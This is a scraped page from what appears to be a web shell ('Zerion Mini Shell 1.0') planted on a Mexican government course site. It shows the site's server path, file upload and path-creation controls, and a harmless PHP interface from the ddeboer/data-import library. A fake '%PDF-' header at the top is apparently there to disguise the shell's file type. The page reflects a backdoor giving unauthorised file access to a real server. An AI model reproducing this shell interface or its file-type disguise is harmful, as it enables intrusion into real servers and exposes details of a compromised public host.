%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/tjamichg/cursos.tjamich.gob.mx/vendor/ddeboer/data-import/src/Reader/
Upload File :
Create Path :
Current File : /home/tjamichg/cursos.tjamich.gob.mx/vendor/ddeboer/data-import/src/Reader/CountableReader.php

<?php

namespace Ddeboer\DataImport\Reader;

use Ddeboer\DataImport\Reader;

/**
 * Reader that provides the count of total items
 *
 * @author David de Boer <david@ddeboer.nl>
 */
interface CountableReader extends Reader, \Countable
{
    // Don't add count() to interface: see https://github.com/ddeboer/data-import/pull/5
}

Zerion Mini Shell 1.0